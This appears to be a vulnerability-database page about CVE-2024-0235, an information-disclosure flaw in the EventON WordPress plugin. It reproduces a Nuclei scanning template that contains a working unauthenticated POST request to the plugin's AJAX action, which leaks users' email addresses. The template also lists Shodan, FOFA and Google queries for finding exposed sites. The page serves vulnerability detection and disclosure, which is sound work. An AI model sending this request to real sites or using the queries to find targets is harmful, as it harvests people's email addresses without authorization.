CVE-2024-0235: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure

日期: 2025-08-01 | 影响软件: EventON | POC: 已公开

漏洞描述

The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.

PoC代码[已公开]

id: CVE-2024-0235

info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
  author: ProjectDiscoveryAI
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
  reference:
    - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0235
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0235
    cwe-id: CWE-862
    epss-score: 0.81849
    epss-percentile: 0.99159
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - "vuln:CVE-2023-2796"
      - http.html:/wp-content/plugins/eventon-lite/
      - http.html:/wp-content/plugins/eventon/
    fofa-query:
      - "wp-content/plugins/eventon/"
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - "/wp-content/plugins/eventon/"
      - /wp-content/plugins/eventon-lite/
    google-query: "inurl:\"/wp-content/plugins/eventon/\""
  tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon,vkev

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "_user_role=administrator"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@'
          - 'status":"good'
          - 'value='
          - '"content":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b9cd1df28f5dac7ad5efc92fb4e259fddf100a0680c4a176aa62bdc09458edb8022100e195175549b445f642c823937a604892bb68e79fdf8a56efee731f86a63d1f64:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-0235.yaml

相关漏洞推荐